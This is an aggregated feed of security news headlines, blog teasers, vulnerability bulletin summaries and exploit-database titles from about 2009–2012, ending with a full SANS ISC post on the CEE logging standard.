http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/phpspybull-cryptanalysis-of-encryption.html

==> Siberia ExploitPack and PDF Exploit Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/siberia-exploitpack-and-pdf-exploit.html

==> DNAScan Malicious Network Activity Reverse Engineering

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/dnascan-malicious-network-activity.html

==> Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/avast-aswrdrsys-kernel-pool-corruption.html

==> PHPSpyScanBot Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/phpspyscanbot-analysis.html

==> [Crimeware] Researches Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/crimeware-researches-about-eleonore.html

==> [Crimeware] Researches and Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/

==> Ars asks: Is using Java on a desktop worth the security risks?

http://feeds.arstechnica.com/arstechnica/security?format=xml We want to know why you use Java, or why you don't.

==> Demo of "serious" networking vulnerabilities cancelled at HP's request

http://feeds.arstechnica.com/arstechnica/security?format=xml Saturday's Toorcon talk was to discuss risks posed by gear from H3C and Huawei.

==> Internet architects mull changes to fight SSL-busting CRIME attacks

http://feeds.arstechnica.com/arstechnica/security?format=xml IETF proposes change to long-standing practice of compressing encrypted data.

==> Apple removes Java from all OS X Web browsers

http://feeds.arstechnica.com/arstechnica/security?format=xml Update is latest example of Apple distancing itself from the Oracle program.

==> Experts: Windows 8 features make account passwords easier to steal

http://feeds.arstechnica.com/arstechnica/security?format=xml Use of reversible crypto to store passwords long considered a no-no.

==> Adobe Reader and Acrobat get another layer of security

http://feeds.arstechnica.com/arstechnica/security?format=xml More sandboxing, Force ASLR on Windows 7 and 8 will protect against prying eyes.

==> Steam vulnerability can lead to remote insertion of malicious code

http://feeds.arstechnica.com/arstechnica/security?format=xml New attack exploits hidden capabilities of Steam URL handler in some browsers.

==> Hospitals' computer hardware also suffers from infection

http://feeds.arstechnica.com/arstechnica/security?format=xml Ancient versions of Windows leave monitors, radiology systems open to attack.

==> Zero-day attacks are meaner, more rampant than we ever thought

http://feeds.arstechnica.com/arstechnica/security?format=xml Study finds average zero-day attack lasts 312 days. Some last two years-plus.

==> Solar panel control systems vulnerable to hacks, feds warn

http://feeds.arstechnica.com/arstechnica/security?format=xml Manufacturers: don't hard-code passwords into your devices.

==> Facebook moves to keep phone numbers for two-factor protection private

http://feeds.arstechnica.com/arstechnica/security?format=xml Numbers used for additional security are no longer in a new reverse lookup database.

==> LulzSec hacker "neuron" pleads guilty to Sony Pictures security breach

http://feeds.arstechnica.com/arstechnica/security?format=xml The hack extracted PII for thousands of people, resulting in losses of $605,000.

==> Ars Technicast, Episode 12: Wham, bam, we talk Internet scams

http://feeds.arstechnica.com/arstechnica/security?format=xml Join us in our conversation about the art of the perfect online scam.

==> Security breach briefly hijacks connections to Google.ie and Yahoo.ie.

http://feeds.arstechnica.com/arstechnica/security?format=xml Ireland's domain registry suspends some operations following security breach.

==> Personal info for 300K exposed in FLA college hack; already 50 identity theft cases

http://feeds.arstechnica.com/arstechnica/security?format=xml SSNs and more lifted from a server. Students, alumni, and employees affected.

==> Attack code for Firefox 16 privacy vulnerability now available online (updated)

http://feeds.arstechnica.com/arstechnica/security?format=xml An eight-line code sample can pluck personal info from your browsing history.

==> Mozilla pulls day-old Firefox 16 from download site over security risk

http://feeds.arstechnica.com/arstechnica/security?format=xml Downgrading to Firefox 15 tonight is not a bad idea, Mozilla says.

==> Google Chrome exploit fetches "Pinkie Pie" $60,000 hacking prize

http://feeds.arstechnica.com/arstechnica/security?format=xml A win for Pinkie Pie and Google, as a fix is released within 12 hours of the exploit.

==> Confirmed: Apple-owned fingerprint software exposes Windows passwords (updated)

http://feeds.arstechnica.com/arstechnica/security?format=xml Exploit software is released one month after the serious weakness came to light.

==> HTTPS Everywhere plugin from EFF protects 1,500 more sites

http://feeds.arstechnica.com/arstechnica/security?format=xml The browser extension makes it easier to connect to encrypted websites.

==> Skype users targeted by malicious worm that locks them out of their PCs

http://feeds.arstechnica.com/arstechnica/security?format=xml The worm attempts to spread by spamming messages to a victim's contact list.

==> How much do Google and Facebook profit from your data?

http://feeds.arstechnica.com/arstechnica/security?format=xml New privacy monitor tries to put a price tag on your privacy.

==> SHA1 crypto algorithm underpinning Internet security could fall by 2018

http://feeds.arstechnica.com/arstechnica/security?format=xml Attacks on weaker MD5 algorithm show how devastating a crack could be.

==> McAfee, Trust Guard certifications can make websites less safe

http://feeds.arstechnica.com/arstechnica/security?format=xml By indexing customers who fail security tests, services flag vulnerable sites.

==> DDoS attacks on major US banks are no Stuxnet—here's why

http://feeds.arstechnica.com/arstechnica/security?format=xml The attacks used compromised Web servers to wield a bigger-than-average club.

==> How to Quickly Create New Habits in Your Life

http://feeds.feedburner.com/epistemeca A friend of mine mentioned that she was having trouble getting in the habit of going to the gym every morning, so I promised an explanation of how I have created so many beneficial habits in my life in the past year. I thought that the email that I sent her might actually be [...]

==> Matching and Mirroring (or: Cybernetic Issues in NLP)

http://feeds.feedburner.com/epistemeca One of the fundamental tenets of Neurolinguistic Programming (NLP) is the idea of “matching and mirroring” – the idea that we create rapport between individuals by mirroring aspects of their physiology in ourselves and, because they see someone who looks like them, they’re more likely to enter in to a rapportive state with us. This [...]

==> My Newest Experiment – The Kindle Book

http://feeds.feedburner.com/epistemeca A few months ago, my friend Drawk Kwast released his first ebook on the Kindle store. And he’s been having some great success (mostly because the book is awesome). Shortly after, I got my first Kindle and was fascinated by all of the low-cost and interesting self-published books on there that I wouldn’t have [...]

==> Maturity and Business

http://feeds.feedburner.com/epistemeca I wrote recently on Maturity and the way I’ve been trying to view my life lately. The place that I’ve found this thinking most interesting is in conceiving of my businesses (esp.THA). It’s easiest to try to solve most of our business problems in the frame of “what’s best for us right now?”. Especially in [...]

==> What is it to be Mature?

http://feeds.feedburner.com/epistemeca I was having a conversation with a friend the other night about maturity and social connection. We tossed around the question of what it is to be “mature”. According to Wikipedia, maturity is “how a person responds to the circumstances or environment in an appropriate and adaptive manner…. Maturity also encompasses being aware of the [...]

==> A Branding MAD Lib

http://feeds.feedburner.com/epistemeca As a new year begins, I always spend a bunch of time pondering my past, my future, and where I’m going. A big part of that is branding and positioning – who am I, and what problem do I want the people in my life to have when they think only of me. This [...]

==> Suppressing Dissent

http://feeds.feedburner.com/epistemeca I once heard it said (and I can’t find the quote) that a society’s level of freedom isn’t determined by how it treats its normal citizens – it’s determined by how it treats those who dissent and don’t adhere to society’s norms. Nowhere do I find this more evident than in the Byron case. Look, [...]

==> Byron (and influence through the media)

http://feeds.feedburner.com/epistemeca If you’re following the Toronto news today, one of the main stories out there is about a former team member of mine, Byron Sonne. The news coverage (CNN, Yahoo) paints Byron to be one step this side of Timothy McVeigh… explosives, threatening police, etc. And that doesn’t even mention that the picture that they’re using [...]

==> Influence and Failing Kindergarten

http://feeds.feedburner.com/epistemeca Had a great chat with my friend Drawk Kwast recently that he recorded for his list of users (which was an honor given the people he usually interviews). As expected, we rambled all over the map and talked about a million different topics around influence, living an adventurous and successful life, and always being willing [...]

==> Return-to-Barry-White Human Exploitation

http://feeds.feedburner.com/epistemeca Spent a weekend in early October hanging out with Tom and Kim at their rapport and anchoring bootcamp. And I was talking in email with my friend Cris Neckar afterward where we were talking about the large number of pre-existing anchors that exist within someone's already vast consciousness. Cris's comment was that using pre-existing material [...]

==> NLP for Social Engineers

http://feeds.feedburner.com/epistemeca Anybody in the industry who has talked to me about NLP has understood my utter frustration about the state of NLP learning and its application to social engineering. It got me riled up enough to do a post on NLP and science a few months ago. And, for the past few months, I’ve been pondering [...]

==> Hacker Halted Redux

http://feeds.feedburner.com/epistemeca I had a blast at Hacker Halted last week, and I did a talk that I was incredibly excited about. It was the first time I was going to talk about some of the new research I’ve done and, while I didn’t plan to give out a huge number of details on the methods, I [...]

==> Recap: The Hope Symposium

http://feeds.feedburner.com/epistemeca This past weekend, I had the privilege of speaking at The Hope Symposium. It was a small conference put on by my friends over at NLP Canada. I was actually lucky enough to speak twice at the conference: I was the opening speaker and the final speaker before Chris and Linda closed out the [...]

==> Social Engineering Abounds

http://feeds.feedburner.com/epistemeca I’ve been ranting for years that we need more exposure about the threat that is Social Engineering. As time goes on, we move more toward a model where the human is the prime exploit target. I just found out that some other people are thinking the same way. Today launches the first Social Engineering Framework. [...]

==> Greed as a prime motivator

http://feeds.feedburner.com/epistemeca I found this article the other day about the teen in Great Britain who managed to completely dupe a bunch of airline executives in believing that he was a millionaire who was looking to buy into their company and expand it. The key to the attack is that greed was the prime motivator in the [...]

==> Constraints and The Bandwidth Problem

http://feeds.feedburner.com/epistemeca I got in a conversation last week about the upcoming bandwidth crisis in the core. I’ve managed to forget about those issues more and more over the past few months. I've spent a lot of time thinking about vulnerability research and social engineering lately at the expense of a lot of other security thinking. But [...]

==> Social Networking and Security

http://feeds.feedburner.com/epistemeca Lately, I’ve been thinking more and more about social networking. I was reading a recent article by Eric Ogren on this issue at Searchsecurity.com. The article said: “According to a recent Websense Inc. survey, the decision has already been made by the business units with 86% of IT respondents reporting pressure to allow more social [...]

==> Obama and Hypnosis

http://feeds.feedburner.com/epistemeca I was on the Altered Egos radio program from Nanaimo, BC this morning, and we were talking about hypnosis, NLP and influence as it relates to political speech, advertising, etc. I mentioned an awesome paper about Obama’s use of hypnotic language and patterning – the paper can be found here. In most of its moral [...]

==> NLP is not Science

http://feeds.feedburner.com/epistemeca One of the people whose work I have enjoyed of late is Gadi Evron. I find that he and I approach problems and random things very similarly (although he blogs his results far, far more frequently than I do… mine just get saved up for classes, webinars and articles). So, Gadi posted recently about his [...]

==> Six Sigma and App Security

http://feeds.feedburner.com/epistemeca From a note that Hoff tweeted, I ended up reading Jeremiah’s awesome new post in which he asked the following question: “How do you achieve quick wins in Web Application Security, rooted in software, with measurable results that CIOs would appreciate? ” I started a thread on twitter with my answer, but that’s not the [...]

==> French hacker arrested for creating, spreading SMS Trojan

http://feeds.feedburner.com/HelpNetSecurity A 20-year-old from Amiens, France, has allegedly managed to steal around half a million euros (over $650,000) by creating and distributing a Trojan disguised as legitimate Android apps. Recently...

==> Newest Apple Java update kills the Java browser plug-in

http://feeds.feedburner.com/HelpNetSecurity Determined not to fall behind on its Java updates, Apple has issued the latest one on Tuesday, the very same day that Oracle pushed out its own. But the big news isn't in the lack of delay, but it...

==> Multi-platform attack site discovered via fake Lookout Android app

http://feeds.feedburner.com/HelpNetSecurity Researchers from security firm TrustGo have recently spotted on Google Play a bogus app that supposedly automates the updating of a batch of other apps. What piqued their interest was the fact th...

==> Fake KLM e-tickets lead to malware

http://feeds.feedburner.com/HelpNetSecurity If you have recently booked a flight with KLM, please be careful when reviewing emails that appear to have been sent from the airline carrier, as rather legitimate-looking fake KLM emails are currentl...

==> Data security and privacy stopping cloud implementations

http://feeds.feedburner.com/HelpNetSecurity Data security, privacy, residency, and compliance issues continue to hinder cloud adoption, with 66 percent of organizations reporting at least one cloud project that has been stopped or delayed due t...

==> Enterprise IT supply chains will be compromised

http://feeds.feedburner.com/HelpNetSecurity Enterprise IT supply chains will be targeted and compromised, forcing changes in the structure of the IT marketplace and how IT will be managed moving forward, according to Gartner. By 2017, IT supply...

==> Self-service password management in the cloud

http://feeds.feedburner.com/HelpNetSecurity Ilantus released Password Express, a self-service password management solution with security and enterprise integration. It can be deployed in the cloud or on premise to meet the needs of an enterpris...

==> Tips for protecting your privacy

http://feeds.feedburner.com/HelpNetSecurity Every month more than 5,000 people take to Twitter to complain about how their mobile device has been snooped on or their visual privacy invaded. Who can't resist eavesdropping on a conversation or gl...

==> Dell unveils new enterprise vision

http://feeds.feedburner.com/HelpNetSecurity Dell announced plans to help businesses globally adopt modern, standards-based data center technologies that enable them to realize repeatable results and superior value at every scale. To do this Del...

==> Windows 8 Administration Pocket Consultant

http://feeds.feedburner.com/HelpNetSecurity Portable and precise, this pocket-sized guide delivers ready answers for administering computers running Windows 8. Zero in on core operations and daily tasks using quick-reference tables, instruction...

==> ModSecurity 2.7.0 released

http://feeds.feedburner.com/HelpNetSecurity ModSecurity makes full HTTP transaction logging possible, allowing complete requests and responses to be logged. Its logging facilities also allow fine-grained decisions to be made about exactly what ...

==> Check Point unveils security appliance with 110GB/s throughput

http://feeds.feedburner.com/HelpNetSecurity Check Point launched its new 21600 Appliance that provides throughput of up to 110 Gbps, a 30 percent boost in SecurityPower units (SPUs) and ultra-low latency for transaction-oriented environments. ...

==> Most believe free Wi-Fi can lead to identity theft

http://feeds.feedburner.com/HelpNetSecurity A new study by the Identity Theft Resource Center (ITRC) and PRIVATE WiFi, revealed that 79% of respondents believe that using a free Wi-Fi connection can lead to identity theft. 45% of responden...

==> IBM releases ten integrated security solutions

http://feeds.feedburner.com/HelpNetSecurity IBM announced a broad set of security software to help holistically secure data and identities. IBM's new software capabilities help clients better maintain security control over mobile devices, ...

==> Secure64 updates its DNS management software

http://feeds.feedburner.com/HelpNetSecurity Secure64 released a new version of its DNS Manager product, which helps communication service providers (CSPs) configure, manage and monitor all of their Secure64 DNS servers in a centralized manner. ...

==> Phishing attacks increasingly target brands

http://feeds.feedburner.com/HelpNetSecurity The number of brands targeted by phishing attacks sustained an all-time high of 428 in April of this year, the second record-breaking quarter for cybercrime brand abuse reported by the APWG this year.

==> Thales releases elliptic curve hardware security modules

http://feeds.feedburner.com/HelpNetSecurity Thales introduced the nShield Connect 6000+ and nShield Solo 6000+ hardware security modules (HSMs), delivering the fastest available support for elliptic curve cryptography (ECC), helping organization...

==> Mandiant unveils cloud-based network monitoring service

http://feeds.feedburner.com/HelpNetSecurity Mandiant announced Mandiant Cloud Alert, a subscription-based service which requires no hardware or software installation. It helps organizations pinpoint compromise in their network environments by i...

==> Cisco and Citrix partner on networking and cloud

http://feeds.feedburner.com/HelpNetSecurity Cisco and Citrix announced an expansion of their desktop virtualization partnership into three strategic areas: cloud networking, cloud orchestration, and mobile workstyles. Cisco and Citrix bel...

==> Facebook partners with Panda Security

http://feeds.feedburner.com/HelpNetSecurity Panda Security signed a collaboration agreement with Facebook to protect users. Facebook users will be able to download a free 6-month version of Panda Internet Security 2013 from the AV Marketplace. ...

==> Time to rethink network management

http://feeds.feedburner.com/HelpNetSecurity The acceleration in data speeds and volumes in telecom networks is increasing the need for real-time network management solutions, according to Napatech. Network probes have been identified as stra...

==> BYOD security and control fears

http://feeds.feedburner.com/HelpNetSecurity Enterprises are restricting employee access to vital work applications due to security and control fears, according to Ping Identity. Employees were found to use an average of five work application...

==> Cloud security application uses electronic fingerprint

http://feeds.feedburner.com/HelpNetSecurity Intrinsic-ID launched Saturnus, an application that allows users to protect data with their mobile devices before sending it to the cloud. It is the first application that offers security based on the...

==> Oracle patches 109 vulnerabilities

http://feeds.feedburner.com/HelpNetSecurity Oracle's Critical Patch Update for October 2012 patches 109 vulnerabilities across hundreds of Oracle products. There are several patches that require immediate attention for enterprises running Oracl...

==> Event: 25th Annual FIRST Conference

http://feeds.feedburner.com/HelpNetSecurity The annual FIRST conference provides a setting for conference participants to attend a wide range of presentations delivered by leading experts in both the CSIRT field and from the global security com...

==> Cloud-based document security from SealPath

http://feeds.feedburner.com/HelpNetSecurity SealPath launched its cloud-based software solution for Professionals and Enterprise users. Using SealPath technology, documents containing sensitive business information are encrypted before they are...

==> Seagate unveils three new enterprise-class HDDs

http://feeds.feedburner.com/HelpNetSecurity Seagate announced three new enterprise-class hard disk drives optimized for traditional data centers and emerging cloud infrastructures. Perfect for cloud bulk data storage, the Seagate Enterpris...

==> Fortinet unveils FortiOS 5.0 operating system

http://feeds.feedburner.com/HelpNetSecurity Fortinet announced FortiOS 5.0, a security operating system that is the foundation for all Fortinet FortiGate integrated security platforms. This new release provides more security, intelligence an...

==> Everyday Cryptography: Fundamental Principles and Applications

http://feeds.feedburner.com/HelpNetSecurity Cryptography is a vital technology that underpins the security of information in computer networks. This book presents a comprehensive introduction to the role that cryptography plays in providing inf...

==> Most people want control of information collected by data brokers

http://feeds.feedburner.com/HelpNetSecurity As Congress examines how data brokers collect, aggregate and share consumers' personal information, a new survey by TrustedID shows that most people are confused about how data brokers operate and wan...

==> SANSFIRE 2011

http://feeds.feedburner.com/SansInstituteAtRiskAll?format=xml SANSFIRE 2011

==> FreeBSD SCTP Remote Denial of Service Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : FreeBSD 8.1

==> OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : OpenOffice 2.4

==> Tftpd32 DNS Server Denial of Service PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Tftpd32

==> Symantec Web Gateway 5.0.2.8 Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Symantec Web Gateway 5.0.2.8

==> Firefox 8/9 AttributeChildRemoved() Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Mozilla Firefox 8.x, 9.x

==> MS12-027 MSCOMCTL ActiveX Buffer Overflow Exploit (meta)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : MSCOMCTL ActiveX

==> Adobe Flash Player .mp4 cprt Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Adobe Flash Player 11.1.102.55

==> Citrix Provisioning Services Streamprocess Opcode 0x40020000 Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Citrix Provisioning Services 5.6 SP1

==> Citrix Provisioning Services streamprocess.exe Component Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Citrix Provisioning Services 5.6

==> HP Data Protector 6.1 EXEC_CMD Remote Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : HP Data Protector 6.1

==> YVS Image Gallery Sql Injection PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : YVS Image Gallery 0.0.0.1

==> ASUS Net4Switch ipswcom.dll ActiveX Buffer Overflow PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Net4Switch ipswcom ActiveX Control 1.0.0020

==> Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow Exploit (meta)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Adobe Flash Player 10.3.181.36

==> ActFax Server FTP RETR Remote Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : ActFax Server 4.27 Build 0223

==> ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : ActFax Server 4.27 Build 0223

==> Novell Netware XNFS.NLM STAT Notify Remote Code Execution PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Novell Netware 6.5 SP8

==> Windows XP win32k.sys Keyboard Layout PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Windows XP

==> Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Wordpress Zingiri Web Shop Plugin 2.2.3

==> AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST) PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : AbsoluteFTP 1.9.6 - 2.2.10

==> Red Hat JBoss Enterprise Application Platform Worm

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Red Hat JBoss Enterprise Application Platform 4.2.x, 4.3.x

==> Vigil@nce: SAP, vulnerability 1678732

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An unknown vulnerability was announced in SAP products. Impacted products: BusinessObjects, Crystal Enterprise, Crystal Reports, SAP ERP, NetWeaver Severity: 2/4 Creation date: 04/10/2012 Revision date: 08/10/2012 DESCRIPTION OF THE VULNERABILITY An unknown vulnerability was announced in SAP products. ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN (...) - Security Vulnerability

==> SEEKER® from Quotium Technologies awarded “Innovation of the Year” at IT-SA

http://www.globalsecuritymag.com/spip.php?page=backend Quotium Technologies announces that its application security solution, Seeker, has been awarded Innovation of the Year at the IT security expo held on 16-18 October 2012 at Nuremberg. IT-SA, the IT security expo at Nuremberg, is one of the largest tradeshows focusing on IT security in Europe, attracting over 5000 visitors yearly. Seeker is a solution developed to pinpoint security flaws from the very beginning of the application development cycle. Entirely automated, the process requires (...) - Product Reviews

==> Vigil@nce: XnView, buffer overflow via JLS

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can invite the victim to open a malicious JLS image with XnView, in order to stop it or to execute code. Impacted products: XnView Severity: 2/4 Creation date: 04/10/2012 DESCRIPTION OF THE VULNERABILITY The XnView software displays and converts images in various formats. The xjpegls.dll library implements the support of images compressed with JPEG-LS (...) - Security Vulnerability

==> Vigil@nce: Oracle Identity Management, Cross Site Scripting via Username

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can generate a Cross Site Scripting in the password reminder form of Oracle Identity Management, in order to execute JavaScript code in the context of victim's web browser. Impacted products: Oracle Identity Manager Severity: 2/4 Creation date: 04/10/2012 DESCRIPTION OF THE VULNERABILITY The Oracle Identity Management product processes the authentication of (...) - Security Vulnerability

==> Big Data Improves Services and Performance Say Business Leaders

http://www.globalsecuritymag.com/spip.php?page=backend A majority of organisations see the main benefits of Big Data as providing information to improve services and performance (56%), rather than marketing (22%), finds a survey from the UK's largest end-to-end infrastructure event, IP EXPO. The survey, which gathered the views of business leaders attending IP EXPO, also shows that nearly half of respondents (49%) are either looking into how Big Data can help their organisations, are investigating a Big Data strategy or already have one. The (...) - Opinion

==> Panda Security and Facebook Join Forces to Help Users Protect Their Digital Lives

http://www.globalsecuritymag.com/spip.php?page=backend Panda Security has signed a collaboration agreement with Facebook to protect users of the popular social networking site. Facebook users will be able to download a free 6-month version of Panda Internet Security 2013 from the AV Marketplace. Additionally, the security company and the social media site will share their databases of malicious URLs to protect users while surfing the Web. Panda Internet Security 2013 is specifically designed to protect users' identity while using social (...) - Business News

==> Check Point extends 21000 appliance Line with New Datacenter Security Offering

http://www.globalsecuritymag.com/spip.php?page=backend Check Point Software Technologies announced the launch of its new 21600 Appliance that provides lightning fast throughput of up to 110 Gbps, a 30 percent boost in SecurityPower units (SPUs) and ultra-low latency for transaction-oriented environments. The 21600 Appliance is a high-performance system designed to optimize a full range of Software Blade protections, providing large enterprises and data centers with industry-leading security and performance. Modern security gateways go beyond (...) - Product Reviews

==> Active Circle chosen by Avid Italy for providing archiving solutions integrated in the Avid media workflow

http://www.globalsecuritymag.com/spip.php?page=backend Active Circle, global provider of storage and archive management solutions for digital content, and Avid Italy, system integrator and distributor of the Avid brand in Italy, are announcing a partnership under which Avid Italy will integrate and sell Active Circle solutions to media customers in Italy. Avid Italy Srl is now an Active Circle VAR (Value Added Reseller) with the required technical expertise to install and to support storage and archive solutions based on the Active Circle (...) - Market News

==> Five top spam texts for 2012 revealed in AdaptiveMobile's Ongoing Threat Analysis

http://www.globalsecuritymag.com/spip.php?page=backend AdaptiveMobile, the world leader in mobile security, today announces five SMS spam campaigns that are plaguing UK mobile phone users in 2012. Text messages offering thousands of pounds to consumers because of mis-sold Payment Protection Insurance scored the highest on AdaptiveMobile's Ongoing Threat Analysis (OTA) which rates the impact of spam text messages by sector. The report highlights the need for operators to continue to focus on keeping the SMS channel clean to protect users from (...) - Malware Update

==> Vigil@nce - Ruby: modify a variable despite SAFE 4

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY When a Ruby application allows an external code to be executed in SAFE 4 mode, it can use Exception or NameError, in order to modify a variable of the application. Impacted products: Fedora, Unix (platform) Severity: 2/4 Creation date: 03/10/2012 DESCRIPTION OF THE VULNERABILITY The security level "$SAFE = 4" limits features that the Ruby code is allowed to use. For (...) - Security Vulnerability

==> Skyscape Cloud Services Takes EMC Documentum To The Cloud

http://www.globalsecuritymag.com/spip.php?page=backend Skyscape Cloud Services Limited, the easy to adopt, easy to use and easy to leave Assured Cloud Services Company, today announced that it will be providing EMC Documentum to its UK Public Sector clients as part of its Software-as-a-Service portfolio. Other products from the EMC Information Intelligence Group will also be made available. This agreement will allow Skyscape to supply a wide range of Cloud Services based upon EMC's extensive software portfolio to the UK Public Sector who will (...) - Business News

==> Vigil@nce - Wireshark 1.8: four vulnerabilities

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY Several vulnerabilities of Wireshark can be used by a remote attacker to create a denial of service or to execute code. Impacted products: openSUSE, Wireshark Severity: 2/4 Creation date: 03/10/2012 DESCRIPTION OF THE VULNERABILITY The Wireshark program captures and displays network packets. Protocols are decoded by dissectors. They are impacted by several (...) - Security Vulnerability

==> Workplace IT: ENISA sees opportunities and risks in “Bring Your Own Device” trend

http://www.globalsecuritymag.com/spip.php?page=backend The developing trend of people using their own computers, phones, social networks or smart devices and applications for work offers benefits, but also brings risks. That's the message from the European Network and Information Security Agency (ENISA) in its latest report, Consumerisation of IT: Top Risks and Opportunities. In today's high-pressure work environment, mobility and networked knowledge are two key factors shaping the future of professional life. These factors, combined with the (...) - Special Reports / affiche

==> APWG Report: Brands Targeted by Cybercrime Gangs Reach All-Time High in April

http://www.globalsecuritymag.com/spip.php?page=backend The APWG reports in its Q2 2012 Phishing Activity Trends Report released this week that the number of brands targeted by phishing attacks sustained an all-time high of 428 in April of this year, the second record-breaking quarter for cybercrime brand abuse reported by the APWG this year. Reports received by the APWG during Q2 2012 indicate new record highs in the numbers of attacks on identifiable brands and in the numbers of phishing websites to lure Web users. The APWG reports that (...) - Malware Update / affiche

==> Only 7 weeks to go before Cyber Security Forum Asia

http://www.globalsecuritymag.com/spip.php?page=backend In seven weeks' time, on December 3-5 Cyber Security Forum Asia: A Threat to Critical National Infrastructure will open. The conference and exhibition will bring together experts, end users, policymakers, industry, and procurement staff. The Conference The conference will feature high level speakers from organizations including the Australian Government, Kaspersky Lab, The Japanese Asia-Pacific Cyberlaw, Cybercrime and Internet Security Institute, Cloud Security Alliance, CyberSecurity (...) - Business News

==> Milipol Qatar 2012 boasts record participation at region's premier security show

http://www.globalsecuritymag.com/spip.php?page=backend The region's most influential trade exhibition dedicated to internal State security wrapped up three days of showcasing the state-of-the-art in security products and services from hundreds of international exhibitors. The Doha Exhibition Centre was the venue for the ninth edition of the biannual event which ran from October 8 to 10, organised jointly by Qatar's Ministry of Interior and the France-based security event experts Milipol. The exhibition was inaugurated by H.E. Minister of (...) - Business News

==> Cyber Security Awareness Month - Day 19: Standard log formats and CEE., (Fri, Oct 19th)

http://isc.sans.org/rssfeed_full.xml Back when I started DShield.org, one of the challenges was dealing with variations in log formats. 10+ years later, this problem hasn't really changed, even though there are some promising solutions (which aren't that different from 10+ years ago). Firewall logs are a pretty simple example. The basic information captured is pretty similar across different firewalls: packet header data. Some log formats are more verbose than others, but the idea is the same and it is not too hard to come up with a standard to express these logs. For DShield, we used a smallest common denominator approach. It wasn't our goal to collect all the details offered by different firewalls. For an enterprise log management system, however, you may need to preserve this detail, and the simple tab-delimited format we came up with for DShield wouldn't be extensible enough. One of the logging standards that is gaining some steam is CEE, or Common Event Expression [1]. To be successful, a logging standard has to address a number of different problems:

Log format: This is the basic syntax used to express logs. This problem is actually the easier one to solve, and the current approach is to use XML to express the logs. XML isn't exactly efficient, but it is extensible and there is a rich set of libraries and database technologies to create and parse XML. I see it as the ugly default solution. A more compact binary format may be preferred, but would have a much higher cost to get started.

Taxonomy: This is the hard problem: the "magic strings" we assign to different events. For firewall logs, this is usually pretty easy. But think about antivirus! You could log the MD5 hash of the sample that was detected as malicious. But this wouldn't be as meaningful as knowing what malware family this sample belongs to. And there is no agreement as to what constitutes a malware family or what to call different families. If you have to correlate logs from different vendors, you will need to translate the name each vendor assigns to a particular piece of malware.

Vendor Acceptance: There are a lot of great proposals in this space that solve the first two problems. But unless you want to implement it yourself, you need a vendor to support a particular solution. In order for a standard to catch on, there has to be customer demand first. Secondly, the solution has to be economical to implement. It helps if the standard is open and not associated with licensing fees. But first of all, the standard needs to be easy to implement.

So how does CEE solve these issues?

Log Format: CEE supports two different formats, XML and JSON. XML is the primary standard, allowing for the most flexibility, but JSON, due to its simple structure, is easier to parse and sufficient in many applications. It is also not terribly hard to convert JSON to XML.

Taxonomy/Vocabulary: CEE doesn't really solve all of this problem, but it starts by defining common labels and data types (like src.ipv4 for the IPv4 address of a source). In part, CEE refers to other standards like CVE to come up with a vocabulary to use to identify events.

Log Transport: I didn't list this problem above, but it is certainly important to consider how logs are transported. In the Unix world, various versions of syslog have become the de-facto standard for log transport. But once you leave Unix-based systems, syslog support is no longer a given. CEE addresses various issues like support for compression and protecting log integrity (which plain old syslog doesn't do well at all).

I do think CEE is certainly a standard to watch out for. Right now, the standard is labeled as beta. The tricky part will be vendor support. The CEE board does include representatives from a number of important vendors, but I don't see a lot (any?) log management vendors on the list. Of course, CEE would help the most if devices generating logs would support it.

[1] http://cee.mitre.org

/** Learn more about log management during my class at CDI in Washington DC (Dec 15/16) */

-- Johannes B. Ullrich, Ph.D. SANS Technology Institute Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
